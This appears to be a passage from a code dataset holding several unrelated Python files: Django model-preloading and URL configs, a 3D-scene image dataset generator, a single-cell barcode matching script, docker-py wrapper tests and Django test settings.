content stringlengths 5 1.05M |
|---|
import sys
from django.apps import AppConfig
preload_models = {}
genre_rmap = {}
def load_model(model, task):
    """Load a pretrained checkpoint for the given model family and task.

    Args:
        model: model family name, 'pretrain' or 'vocab'.
        task: task name used to select the dataset/checkpoint (e.g. 'gender').

    Returns:
        A CUDA-resident torch module with weights restored from disk.

    Side effects:
        Extends sys.path with the project tree and populates the module-level
        genre_rmap with the inverse of the persisted genre map.
    """
    # Imports are deferred to call time so the Django app module can be
    # imported without the heavy ML stack present. The original also imported
    # tensorflow and torch.nn.functional, which were never used — dropped.
    import numpy as np
    import torch
    import os

    # Make the project packages importable from this Django app.
    sys.path.append("..")
    sys.path.extend([os.path.join(root, name) for root, dirs, _ in os.walk("..") for name in dirs])
    from data_handler import DataHandler
    from config import Config
    from models.pretrain_model import PretrainModel
    from models.vocab_model import VocabModel

    def name_to_model(name, config):
        # Map a model-family name to its constructor.
        if name == 'pretrain':
            return PretrainModel(config)
        if name == 'vocab':
            return VocabModel(config)
        raise NotImplementedError

    # Hyper-parameters must match those used when the checkpoint was trained.
    use_cpu = False
    epochs = 20
    max_dialog_words = 64
    vocab_dim = 32
    dialog_dim = 128
    feature_dim = 256
    log_interval = 10

    # Build the inverse genre lookup (id -> name). Mutating the module-level
    # dict needs no 'global' statement, so the original one was removed.
    genre_map = np.load('/home/yukuo/movie-dialog-project/genre_map.npy', allow_pickle=True)[()]
    for key, value in genre_map.items():
        genre_rmap[value] = key

    store = DataHandler(model, task, max_dialog_words)
    config = Config(store, use_cpu, epochs, vocab_dim, dialog_dim, feature_dim, log_interval)
    save_path = os.path.join('/home/yukuo/movie-dialog-project/result',
                             '{}_{}_{}_{}_{}.ckpt'.format(model, task, vocab_dim, dialog_dim, feature_dim))
    # Use a distinct local instead of rebinding the 'model' parameter.
    net = name_to_model(model, config)
    net.load_state_dict(torch.load(save_path))
    net.cuda()
    return net
class MyappConfig(AppConfig):
    """Django app config that warms the model cache when the dev server starts."""

    name = 'myapp'

    def ready(self):
        # Only preload when actually serving requests; skip for migrations,
        # shell, tests, etc. Model imports happen inside load_model to avoid
        # an AppRegistryNotReady exception at module import time.
        if 'runserver' not in sys.argv:
            return True
        for task in ('gender', 'genre', 'IMDB'):
            preload_models[task] = load_model('vocab', task)
|
""" Defines an example to create a dataset of an environment """
import argparse
import os
import random
from collections import namedtuple
from pdb import set_trace
from PIL import Image
from shapes3d import Shapes3D
# Environment geometry and object-generation parameters.
ENV_DIM = 20  # side length of the square ground plane
MAX_NUM_OBJS = 15  # most objects spawned per environment
MIN_NUM_OBJS = 7  # fewest objects spawned per environment
MIN_OBJ_DIM = 0.5  # smallest object dimension
MAX_OBJ_DIM = 1.5  # largest object dimension
FOV = 45  # camera field of view, degrees
PLANE_COLOR = [1, 1, 1]  # RGB colour of the ground plane
TYPES = ['sphere', 'cube', 'cylinder', 'capsule']  # spawnable primitive types
# Lightweight record of a placed object's position and collision footprint.
Obj = namedtuple("Object", "x y collision_radius")
def generate_dataset(destination_folder, num_total_imgs, num_total_envs, num_eval_envs, width, height):
    """
    Generates image triplets (a, b, c) plus depth maps and relative 6-DOF
    poses and saves them under destination_folder/<env_num>/. Roughly
    num_total_imgs/num_total_envs triplets are produced per environment; the
    first num_eval_envs environments go to the validation split.
    """
    train, val = [], []
    # Check if destination folder exists, create it otherwise
    check_folder_or_create(destination_folder)
    # Create the shared simulation environment (reused across env_num rounds)
    env = Shapes3D(gui=True, use_egl_plugin=False, env_dim=ENV_DIM, walls=True)
    env.reset()
    # Camera intrinsic matrix is fixed for the whole dataset
    intrinsic = env.computeProjectionMatrixFOV(fov=FOV, aspect=1)
    save_in_txt(os.path.join(destination_folder, "intrinsic_matrix.txt"), intrinsic)
    for env_num in range(0, num_total_envs):
        objs = [] # List of positions and dimenssion of objects
        # Create per-environment folder if it does not exist
        check_folder_or_create(os.path.join(destination_folder, str(env_num)))
        # Populate the environment with a random number of random objects
        num_obj = random.randint(MIN_NUM_OBJS, MAX_NUM_OBJS)
        for _ in range(num_obj):
            # Choose random color (opaque RGBA)
            r = random.uniform(0, 1)
            g = random.uniform(0, 1)
            b = random.uniform(0, 1)
            color = [r, g, b, 1]
            # Choose random primitive type
            obj_type = random.choice(TYPES)
            collision_radius = None
            dimension = None
            # Choose random dimensions; z_pos keeps the object resting on the plane
            if obj_type == "cube":
                x = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
                y = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
                z = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)/2
                dimension = [x, y, z]
                # Conservative footprint: the larger of the two half-extents
                collision_radius = max([x, y])
                z_pos = z
            else:
                dimension = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)
                if obj_type in ["cylinder", "capsule"]:
                    # For these, 'dimension' is the height; radius drawn separately
                    collision_radius = random.uniform(MIN_OBJ_DIM, MAX_OBJ_DIM)
                    z_pos = dimension/2
                else:
                    # Sphere: dimension is the radius
                    collision_radius = dimension
                    z_pos = collision_radius
            # Rejection-sample a position until it does not overlap existing objects
            while True:
                min_pos = ENV_DIM/2 - collision_radius
                x_pos = random.uniform(-min_pos, min_pos)
                y_pos = random.uniform(-min_pos, min_pos)
                # check_collisions returns True when the spot is clear
                if check_collisions(x_pos, y_pos, collision_radius, objs):
                    objs.append(Obj(x=x_pos, y=y_pos, collision_radius=collision_radius))
                    break
            position = [x_pos, y_pos, z_pos]
            if obj_type == "cube":
                env.add_cube(dimension, color, position)
            elif obj_type == "sphere":
                env.add_sphere(dimension, color, position)
            elif obj_type == "capsule":
                env.add_capsule(collision_radius, dimension, color, position)
            elif obj_type == "cylinder":
                env.add_cylinder(collision_radius, dimension, color, position)
        # Render a triplet per image slot: a base view (1) plus two nearby views (2, 3)
        for img_num in range(int(num_total_imgs/num_total_envs)):
            epsilon = 0.1
            range_dis = ENV_DIM / 2 - epsilon
            while True:
                # Base render: random pose anywhere in the environment
                succ1, img1, depth1, _, pos, ori = get_cam_render(
                    [0, 0, 0],
                    [[-range_dis, range_dis], [-range_dis, range_dis], [MIN_OBJ_DIM, MAX_OBJ_DIM]],
                    [0, 0, 0],
                    [[0, 0], [0, 10], [0, 360]],
                    width, height,
                    intrinsic,
                    env, objs)
                if succ1 is False:
                    continue
                x_cam, y_cam, z_cam = pos
                roll, pitch, yaw = ori
                # First small camera movement relative to the base pose (up to 20 tries)
                # NOTE(review): if all 20 tries below fail with succ2 False,
                # 'succ3' is read before assignment and raises NameError — confirm.
                for _ in range(20):
                    succ2, img2, depth2, _, dpos2, dori2 = get_cam_render(
                        [x_cam, y_cam, z_cam], [[-MIN_OBJ_DIM, MIN_OBJ_DIM]] * 3,
                        [roll, pitch, yaw], [[0, 0], [-5, 5], [-5, 5]],
                        width, height,
                        intrinsic,
                        env, objs)
                    if succ2 is True:
                        dx2, dy2, dz2 = dpos2
                        droll2, dpitch2, dyaw2 = dori2
                        # Second movement, offset on the opposite side of the base pose
                        for _ in range(20):
                            succ3, img3, depth3, _, dpos3, dori3 = get_cam_render(
                                [x_cam - dx2, y_cam - dy2, z_cam - dz2],
                                [[-MIN_OBJ_DIM, MIN_OBJ_DIM]] * 3,
                                [roll, pitch, yaw], [[0, 0], [-5, 5], [-5, 5]],
                                width, height,
                                intrinsic,
                                env, objs)
                            if succ3 is True:
                                dx3, dy3, dz3 = dpos3
                                droll3, dpitch3, dyaw3 = dori3
                                break
                    if succ2 and succ3:
                        break
                if succ2 and succ3:
                    break
            # Save the triplet; view 2 is "a", the base view is "b", view 3 is "c"
            dest = os.path.join(destination_folder, str(env_num))
            img_dest = os.path.join(dest, '%s.jpg')
            depth_dest = os.path.join(dest, '%s.npy')
            dof_dest = os.path.join(dest, "%s_6dof.txt")
            # Images (drop any alpha channel)
            img1 = Image.fromarray(img1[:, :, :3])
            img2 = Image.fromarray(img2[:, :, :3])
            img3 = Image.fromarray(img3[:, :, :3])
            img2.save(img_dest % (str(img_num) + "_a"))
            img1.save(img_dest % (str(img_num) + "_b"))
            img3.save(img_dest % (str(img_num) + "_c"))
            # Depth maps (numpy pickle dumps)
            depth2.dump(depth_dest % (str(img_num) + "_a"))
            depth1.dump(depth_dest % (str(img_num) + "_b"))
            depth3.dump(depth_dest % (str(img_num) + "_c"))
            # First num_eval_envs environments form the validation split
            if env_num < num_eval_envs:
                val.append((str(env_num), str(img_num)))
            else:
                train.append((str(env_num), str(img_num)))
            # Relative 6-DOF transforms between the views
            save_in_txt(dof_dest % (str(img_num) + "_btoa"),
                        [dx2, dy2, dz2, droll2, dpitch2, dyaw2])
            save_in_txt(dof_dest % (str(img_num) + "_btoc"),
                        [dx3 - dx2, dy3 - dy2, dz3 - dz2, droll3, dpitch3, dyaw3])
        # Clean environment for the next round of objects
        env.reset()
    # Shuffle and persist the split manifests
    train = random.sample(train, len(train))
    val = random.sample(val, len(val))
    train = [' '.join(x) for x in train]
    val = [' '.join(x) for x in val]
    save_in_txt(os.path.join(destination_folder, "train.txt"), train, '\n')
    save_in_txt(os.path.join(destination_folder, "val.txt"), val, '\n')
def get_cam_render(pos0, pos_range, ori0, ori_range, width, height, intrinsic, env, objs):
    """
    Render from a randomly perturbed camera pose and validate the result.

    A delta position/orientation is sampled uniformly within pos_range /
    ori_range and added to pos0 / ori0. Returns
    (success, img, depth, seg, dpos, dori); on failure the non-flag values
    may be None. A render is rejected when the camera would collide with an
    object, leave the environment, or the segmentation shows too few bodies.
    """
    distance = 1e-5
    img, depth, seg, dpos, dori = [None]*5
    x_cam, y_cam, z_cam = pos0
    x_rang, y_rang, z_rang = pos_range
    roll, pitch, yaw = ori0
    roll_rang, pitch_rang, yaw_rang = ori_range
    # Sample a positional delta and the resulting candidate camera position
    dx = random.uniform(*x_rang)
    dy = random.uniform(*y_rang)
    dz = random.uniform(*z_rang)
    x_cam2 = x_cam + dx
    y_cam2 = y_cam + dy
    z_cam2 = z_cam + dz
    position = [x_cam2, y_cam2, z_cam2]
    # Reject if the camera would be too close to any object
    if not check_collisions(x_cam2, y_cam2, MIN_OBJ_DIM*2, objs):
        return False, img, depth, seg, dpos, dori
    # Reject if the camera leaves the environment bounds
    if abs(x_cam2) > ENV_DIM/2 or abs(y_cam2) > ENV_DIM/2:
        return False, img, depth, seg, dpos, dori
    # Sample an orientation delta
    droll = random.uniform(*roll_rang)
    dpitch = random.uniform(*pitch_rang)
    dyaw = random.uniform(*yaw_rang)
    roll2 = roll + droll
    pitch2 = pitch + dpitch
    yaw2 = yaw + dyaw
    # Render from the candidate pose
    extrinsic = env.computeViewMatrixFromYawPitchRoll(
        position, distance, yaw2, pitch2, roll2)
    img, depth, seg = env.compute_render(width, height, intrinsic, extrinsic)
    # Collect the set of distinct body ids visible in the segmentation
    seg = set(seg.reshape(1, -1).tolist()[0]) # Removing repeations
    seg = seg.difference([-1]+env.walls_id) # Removing walls and background
    # Accept only if the ground plane is visible and, counting the plane,
    # more than three bodies remain (i.e. at least three objects are in view).
    # NOTE(review): the original docstring said "at least two objects" —
    # the threshold here requires more; confirm which is intended.
    if env.plane_id in seg and len(seg) > 3:
        dpos = [dx, dy, dz]
        dori = [droll, dpitch, dyaw]
        return True, img, depth, seg, dpos, dori
    else:
        return False, img, depth, seg, dpos, dori
def save_in_txt(destination, array, char=' '):
    """Write the elements of *array* to *destination*, joined by *char*.

    Overwrites any existing file; each element is converted with str().
    """
    # Mode 'w' already truncates an existing file, so the original
    # exists()/remove() dance was redundant and racy — removed.
    with open(destination, 'w') as txt:
        txt.write(char.join(str(i) for i in array))
def check_collisions(x, y, collision_radius, objs):
    """
    Return True when the position (x, y) with radius collision_radius is
    clear of every object in objs (no collision), False otherwise. A small
    epsilon pads the combined radii so objects never quite touch.
    """
    epsilon = 0.2
    return all(
        (obj.x - x) ** 2 + (obj.y - y) ** 2 >
        (obj.collision_radius + collision_radius + epsilon) ** 2
        for obj in objs
    )
def check_folder_or_create(folder):
    """Create *folder* (and any missing parents) if it does not already exist."""
    if not os.path.exists(folder):
        print("Creating folder %s" % folder)
    # exist_ok avoids the race between the existence check and the creation
    # (the original could raise FileExistsError if the folder appeared in between).
    os.makedirs(folder, exist_ok=True)
if __name__ == '__main__':
    # Command-line entry point: dataset size and destination parameters.
    parser = argparse.ArgumentParser(
        description="Arguments to generate a dataset using this environment")
    parser.add_argument('-f', '--destination', type=str, default="dataset_generated",
                        help="Folder destination for the dataset files")
    parser.add_argument('-i', '--num_total_imgs', type=int, default=100,
                        help="Number of images to generate in total")
    parser.add_argument('-e', '--num_total_envs', type=int, default=10,
                        help="Number of environments to generate")
    parser.add_argument('--num_eval_envs', type=int, default=2,
                        help="Number of environments used in evaluation")
    parser.add_argument('--width', type=int, default=300,
                        help="Width in pixels of the images")
    # BUGFIX: the original help text for --height said "Width" (copy-paste).
    parser.add_argument('--height', type=int, default=300,
                        help="Height in pixels of the images")
    args = parser.parse_args()
    generate_dataset(args.destination, args.num_total_imgs, args.num_total_envs,
                     args.num_eval_envs, width=args.width, height=args.height)
|
# URL configuration for the satchmo shop app.
# NOTE(review): uses the pre-Django-1.4 string-view `patterns()` API from
# django.conf.urls.defaults, which was removed in later Django versions;
# left untouched because every entry name is part of the public URL contract.
from django.conf import settings
from django.conf.urls.defaults import *
from satchmo.configuration import config_value
from satchmo.product.urls import urlpatterns as productpatterns
from satchmo.shop import get_satchmo_setting
from satchmo.utils import app_enabled
# Start from the shop URLs configured in settings, then append the views below.
urlpatterns = get_satchmo_setting('SHOP_URLS')
urlpatterns += patterns('satchmo.shop.views',
    (r'^$','home.home', {}, 'satchmo_shop_home'),
    (r'^add/$', 'smart.smart_add', {}, 'satchmo_smart_add'),
    # Cart display and manipulation (plain and AJAX variants)
    (r'^cart/$', 'cart.display', {}, 'satchmo_cart'),
    (r'^cart/accept/$', 'cart.agree_terms', {}, 'satchmo_cart_accept_terms'),
    (r'^cart/add/$', 'cart.add', {}, 'satchmo_cart_add'),
    (r'^cart/add/ajax/$', 'cart.add_ajax', {}, 'satchmo_cart_add_ajax'),
    (r'^cart/qty/$', 'cart.set_quantity', {}, 'satchmo_cart_set_qty'),
    (r'^cart/qty/ajax/$', 'cart.set_quantity_ajax', {}, 'satchmo_cart_set_qty_ajax'),
    (r'^cart/remove/$', 'cart.remove', {}, 'satchmo_cart_remove'),
    (r'^cart/remove/ajax$', 'cart.remove_ajax', {}, 'satchmo_cart_remove_ajax'),
    (r'^checkout/', include('satchmo.payment.urls')),
    (r'^contact/$', 'contact.form', {}, 'satchmo_contact'),
    (r'^history/$', 'orders.order_history', {}, 'satchmo_order_history'),
    (r'^tracking/(?P<order_id>\d+)/$', 'orders.order_tracking', {}, 'satchmo_order_tracking'),
    (r'^search/$', 'search.search_view', {}, 'satchmo_search'),
    # Override comments with our redirecting view. You can remove the next two
    # URLs if you aren't using ratings.
    #(r'^comments/post/$', 'comments.post_rating', {'maxcomments': 1 }, 'satchmo_rating_post'),
    (r'^comments/', include('django.contrib.comments.urls')),
    # Used for downloadable products.
    (r'^download/process/(?P<download_key>\w+)/$', 'download.process', {}, 'satchmo_download_process'),
    (r'^download/send/(?P<download_key>\w+)/$', 'download.send_file', {}, 'satchmo_download_send'),
)
# here we add product patterns directly into the root url
urlpatterns += productpatterns
# Optional apps are mounted only when enabled in the configuration.
if app_enabled('l10n'):
    urlpatterns += patterns('',
        # Used to set the default language.
        (r'^i18n/', include('satchmo.l10n.urls'))
    )
if app_enabled('wishlist'):
    urlpatterns += patterns('',
        ('wishlist/', include('satchmo.wishlist.urls')),
    )
# Static "thank you" page rendered via the generic direct_to_template view.
urlpatterns += patterns('django.views.generic',
    (r'^contact/thankyou/$','simple.direct_to_template',{'template':'thanks.html'},'satchmo_contact_thanks'),
)
|
#!/usr/bin/env python
"""
:Author: Ji Research Group/Stanford Genome Technology Center
:Contact: sgrimes@stanford.edu
:Creation date: 03/24/2021
:Description:
This script extracts soft clipped bases at beginning (FWD strand) or end (REV strand)
of read. These sequences will subsequently be searched for expected single cell barcode sequences.
Revisions:
- 03/26/2021 Import reusable methods from sc_barcodes
- 04/28/2021 Add nbest command line argument
"""
import argparse, sys, os, re, pysam, csv, gzip, string, distance
import numpy as np, pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from scipy.sparse import csr_matrix
import sc_barcodes as scb
script_name = os.path.basename(__file__)
print("Running ", script_name)
# Use SEARCH_OFFSET if desired to ignore part of the 13bp 10X adapter and the
# 10bp UMI during the matching process.
SEARCH_OFFSET = 0
MAX_SEARCH_LEN = 55-SEARCH_OFFSET  # length of the soft-clip window searched for the barcode
MIN_SCORE = 0.0  # minimum cosine similarity for a barcode candidate to be kept
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Define internal modules #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
def parse_commandline():
    """Parse the command-line options and echo the namespace to stderr."""
    parser = argparse.ArgumentParser()
    # Required inputs
    parser.add_argument('--bam', '-b', type=str, required=True,
                        help='input bam file')
    parser.add_argument('--barcodes', '-c', type=str, required=True,
                        help='cellranger barcodes file')
    parser.add_argument('--strand', '-s', type=str, required=True,
                        choices=['plus','minus','both'], help='gene strand')
    # Optional inputs and tuning parameters
    parser.add_argument('--exonrds', '-x', type=str, required=False,
                        help='reads with exon skipping pattern identified')
    parser.add_argument('--kmer_len', '-k', type=int, required=False, default=8,
                        help='k-mer length')
    parser.add_argument('--nbest', '-n', type=int, required=False, default=5,
                        help='number of best matches to evaluate')
    args = parser.parse_args()
    print(args, file=sys.stderr)
    return args
def debug_samrd(samrd):
    """Return a compact [name-suffix, strand, tid, pos] summary of a read for debugging."""
    direction = 'Rev' if samrd.is_reverse else 'Fwd'
    return [samrd.qname[-16:], direction, samrd.tid, samrd.pos]
def best_barcodes(string, barcodes, barcode_tfidf, vectorizer, nbest=5):
    """Return up to nbest (barcode, cosine-score) pairs for a soft-clip string.

    Falls back to [['N', 0]] when no candidate scores above MIN_SCORE.
    NOTE(review): the 'string' parameter shadows the imported string module and
    the local 'best_barcodes' shadows the function's own name; on a hit the
    return value is a single-use zip iterator, not a list — confirm callers
    only iterate it once.
    """
    best_barcodes = [['N',0]]
    # Project the query into the same k-mer count space as the barcode matrix.
    barcode_seq_tfidf = vectorizer.transform([string])
    cos_sim = cosine_similarity(barcode_seq_tfidf, barcode_tfidf, dense_output=False)
    # Collect the non-zero similarities as ((row, col), score) pairs; the
    # query has one row, so col indexes into `barcodes`.
    non_zero = [((i, j), cos_sim[i,j]) for i, j in zip(*cos_sim.nonzero())]
    nz_sorted = sorted(non_zero, key=lambda x: -x[1])
    # Keep the nbest column indices whose score clears the threshold.
    idx_nbest = [x[0][1] for x in nz_sorted[0:nbest] if x[1] > MIN_SCORE]
    if len(idx_nbest) > 0:
        best_barcodes = zip([barcodes[i] for i in idx_nbest], [cos_sim[(0,i)] for i in idx_nbest])
    return best_barcodes
def format_bc_string(soft_clips, strand, bc_start):
    """Format a soft-clip string as 'adapter|barcode|UMI' around a barcode hit.

    Args:
        soft_clips: the soft-clipped sequence that was searched.
        strand: 'fwd' or 'rev'; the rev layout is reverse-complemented so the
            returned string always reads adapter|barcode|UMI.
        bc_start: start index of the 16bp barcode within soft_clips.
    """
    # BUGFIX: was `bc_end = pos+16`, reading an undefined local `pos` — it only
    # worked by accident via the module-level `pos` set in the main loop.
    bc_end = bc_start + 16
    if strand == 'fwd': # layout: [R1 adapter (<=22bp)][barcode (16bp)][UMI (<=10bp)]
        r1_adapter = soft_clips[max(bc_start-22, 0):bc_start]
        barcode = soft_clips[bc_start:bc_end]
        umi = soft_clips[bc_end:min(bc_end+10, len(soft_clips))]
        return '|'.join([r1_adapter, barcode, umi])
    else: # reverse strand: [UMI][barcode][R1 adapter], reverse-complemented on output
        umi = soft_clips[max(bc_start-10, 0):bc_start]
        barcode = soft_clips[bc_start:bc_end]
        r1_adapter = soft_clips[bc_end:min(bc_end+22, len(soft_clips))]
        return '|'.join([scb.reverse_complement(r1_adapter), scb.reverse_complement(barcode), scb.reverse_complement(umi)])
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Check for valid arguments, and that files exist #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Parse arguments and open the input/output files.
args = parse_commandline()
KMER_LEN = args.kmer_len
NBEST = args.nbest
# Open as binary BAM or text SAM depending on the file extension.
sam_input = pysam.Samfile(args.bam,'rb') if args.bam[-3:] == 'bam' else pysam.Samfile(args.bam,'r')
sam_fname = os.path.basename(args.bam)
# Cell barcodes are the first 16 characters of each line; gzipped files yield
# bytes and must be decoded.
if args.barcodes.endswith('gz'):
    barcode_input = gzip.open(args.barcodes, 'r')
    barcodes = [line[:16].decode('ascii') for line in barcode_input]
else:
    barcode_input = open(args.barcodes, 'r')
    barcodes = [line[:16] for line in barcode_input]
xskip_fn = args.exonrds
try:
    # Output file name is derived from the input BAM/SAM name.
    out_fn = sam_fname[0:-4] + '.softclip.bestN.txt'
    out_file = open(out_fn, 'w')
    out_csv = csv.writer(out_file, delimiter="\t", quoting=csv.QUOTE_MINIMAL)
except:  # NOTE(review): bare except also hides non-I/O errors; consider OSError
    print("Unable to open text file for output: ", out_fn)
    sys.exit(1)
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Vectorize barcodes #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
#https://bergvca.github.io/2017/10/14/super-fast-string-matching.html
def ngrams(string, kmer_len=KMER_LEN):
    """Decompose *string* into its overlapping k-mers of length *kmer_len*."""
    shifted = [string[i:] for i in range(kmer_len)]
    return [''.join(kmer) for kmer in zip(*shifted)]
# Build a k-mer vocabulary over all barcode sequences, in both the forward
# and the reverse-complement orientation, for cosine-similarity matching.
vectorizer_fwd = CountVectorizer(min_df=1, analyzer=ngrams)
fwd_barcode_tfidf = vectorizer_fwd.fit_transform(barcodes)
vectorizer_rev = CountVectorizer(min_df=1, analyzer=ngrams)
rev_barcode_tfidf = vectorizer_rev.fit_transform([scb.reverse_complement(barcode) for barcode in barcodes])
# Optional list of read names with an exon-skipping pattern, indexed by name.
if args.exonrds:
    xskip_rdnames = pd.read_csv(xskip_fn, sep='\t', header=None, index_col=0)
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Read sam file and check for soft-clips at beginning or end of read #
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
# Expected sequence (FWD), soft clips indicated by []
# [Illumina R1 adapter][cell barcode][UMI][10X internal adapter] cDNA [polyA][adapter]
#
# Expected sequence (REV), soft clips indicated by []
# [adapter][polyT] cDNA [10X internal adapter][UMI][barcode][Illumina R1 adapter]
# Per-run counters; adapter_flank_bp and last_qname are kept from the original
# even though they are not referenced below.
i = 0; tot_rds = 0; adapter_flank_bp = 6; last_qname = 'none';
out_csv.writerow(['rd_name', 'exon_skip', 'strand', 'barcode', 'score', 'dist', 'pos', 'adapter|BC|UMI', 'search_len', 'align_start', 'align_end'])
sc_3or5 = '5prime' if args.strand == 'plus' else '3prime'
for samrd in sam_input.fetch(until_eof=True):
    i += 1
    # Only evaluate primary alignments.
    if samrd.is_secondary:
        continue
    # When an exon-skip read list was supplied, restrict processing to those reads.
    if args.exonrds and samrd.qname in xskip_rdnames.index:
        xskip_pattern = xskip_rdnames.loc[samrd.qname,1]
    elif args.exonrds:
        continue
    else:
        xskip_pattern = None
    align_strand = 'minus' if samrd.is_reverse else 'plus'
    tot_rds += 1
    soft_clips = scb.extract_softclips(samrd)
    # BUGFIX: this default was previously assigned to the misspelled name
    # 'barcodes_scores', so reads whose soft clips were too short to search
    # reused the previous read's matches (or raised NameError on the first read).
    barcode_scores = [['N', 0]]
    if args.strand == 'plus':
        sc_5prime_len = len(soft_clips['fwd'])
        if sc_5prime_len > 16+SEARCH_OFFSET+1:
            # Work backwards from the end of the soft-clipped sequence
            # (10X adapter, then UMI, then cell barcode) to bound the search window.
            i_start = max(sc_5prime_len-MAX_SEARCH_LEN-SEARCH_OFFSET, 0)
            search_seq = soft_clips['fwd'][i_start:-SEARCH_OFFSET] if SEARCH_OFFSET > 0 else soft_clips['fwd'][i_start:]
            barcode_scores = best_barcodes(search_seq, barcodes, fwd_barcode_tfidf, vectorizer_fwd, NBEST)
    else: # args.strand == 'minus'
        sc_3prime_len = len(soft_clips['rev'])
        if sc_3prime_len > 16+SEARCH_OFFSET+1:
            i_end = min(MAX_SEARCH_LEN+SEARCH_OFFSET, sc_3prime_len)
            search_seq = soft_clips['rev'][SEARCH_OFFSET:i_end]
            barcode_scores = best_barcodes(search_seq, barcodes, rev_barcode_tfidf, vectorizer_rev, NBEST)
    # Evaluate candidates best-first; stop at the first near-exact match.
    for bc_score in barcode_scores:
        if bc_score[0] != "N":
            if args.strand == 'plus':
                [dist, pos] = scb.calc_edit_distance(bc_score[0], search_seq, 16)
                barcode_with_flanking = format_bc_string(search_seq, 'fwd', pos)
                bc_pos = pos-len(search_seq)
            else: #args.strand == 'minus'
                [dist, pos] = scb.calc_edit_distance(scb.reverse_complement(bc_score[0]), search_seq, 16)
                barcode_with_flanking = format_bc_string(search_seq, 'rev', pos)
                bc_pos = pos
            out_csv.writerow([samrd.qname, xskip_pattern, align_strand, bc_score[0], bc_score[1], dist, bc_pos, barcode_with_flanking, len(search_seq),
                              samrd.reference_start, samrd.reference_end])
            if dist < 2: break
print(i, "sam records read")
print("Evaluated", tot_rds, "primary (full transcript) alignments")
for fh in [sam_input, barcode_input, out_file]:
    fh.close()
|
import logging
import pytest
from pytest_docker_py.config import Config
from pytest_docker_py.docker_py_wrapper import DockerPyWrapper
# Verbose, timestamped log format so docker / urllib3 wire traffic is traceable.
logging.basicConfig(
    format='%(asctime)s.%(msecs)03d %(levelname)8s --- [%(process)5d] %(filename)25s:%(funcName)30s, %(lineno)3s: %(message)s',
    datefmt='%m/%d/%Y %H:%M:%S',
    level=logging.DEBUG)
logging.getLogger('docker').setLevel(logging.DEBUG)
logging.getLogger('urllib3').setLevel(logging.DEBUG)
# Module-level wrapper shared by all tests in this file.
docker_py_wrapper = DockerPyWrapper()
@pytest.fixture
def configuration():
    """Two-container test configuration: an alpine box with a published port
    and a named volume, plus a busybox attached to a user-defined network."""
    alpine = {'image': 'alpine:latest',
              'name': 'alpine-01',
              'ports': {'1234/tcp': 1234},
              'volumes': {'alpine-01': {'bind': '/tmp', 'mode': 'rw'}},
              'command': 'sleep 12345'}
    busybox = {'image': 'busybox:latest',
               'name': 'busybox-01',
               'network': 'docker_py_wrapper'}
    return Config([alpine, busybox])
def test_configuration(configuration):
    """The Config object must report exactly the images and networks it was built with."""
    expected_images = ['alpine:latest', 'busybox:latest']
    assert configuration.images() == expected_images
    assert configuration.networks() == ['docker_py_wrapper']
@pytest.mark.timeout(30)
def test_pull_images(configuration):
    """Images removed via rm_images must be absent, then reappear after pull()."""
    images = configuration.images()
    docker_py_wrapper.rm_images(images)
    for image in images:
        assert image not in docker_py_wrapper.ls_images()
    docker_py_wrapper.pull(images)
    for image in images:
        assert image in docker_py_wrapper.ls_images()
def test_stop_start_containers(configuration):
    """start_containers must create containers, networks and volumes;
    rm_containers must remove the containers and their networks/volumes."""
    docker_py_wrapper.start_containers(configuration)
    running = docker_py_wrapper.ls_containers(configuration.images())
    assert len(running) == 2
    assert docker_py_wrapper.ls_networks(configuration.networks()) == ['docker_py_wrapper']
    assert docker_py_wrapper.ls_volumes(configuration.volumes()) == ['alpine-01']
    docker_py_wrapper.rm_containers(configuration.images())
    assert docker_py_wrapper.ls_containers(configuration.images()) == []
    assert docker_py_wrapper.ls_networks(configuration.networks()) == []
    assert docker_py_wrapper.ls_volumes(configuration.volumes()) == []
|
# -*- coding: utf-8
# Django test settings for the plans_paypal package.
from __future__ import absolute_import, unicode_literals
DEBUG = True
USE_TZ = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "-#5o&sf4iu8&-@na$ad*(t)0gl6_gnw-7_=mk5!zcck)p0w&30"
# In-memory SQLite keeps the test database ephemeral and fast.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.sqlite3",
        "NAME": ":memory:",
    }
}
ROOT_URLCONF = "tests.urls"
INSTALLED_APPS = [
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sites",
    "plans",
    "paypal.standard.ipn",
    "plans_paypal",
]
SITE_ID = 1
# NOTE(review): "BUSSINESS" is misspelled, but other code may look up this
# exact setting name — do not rename without checking all usages.
PAYPAL_BUSSINESS_EMAIL = "fake@email.com"
MIDDLEWARE = ("author.middlewares.AuthorDefaultBackendMiddleware",)
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": False,
        "OPTIONS": {
            "debug": True,
            "context_processors": [
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ],
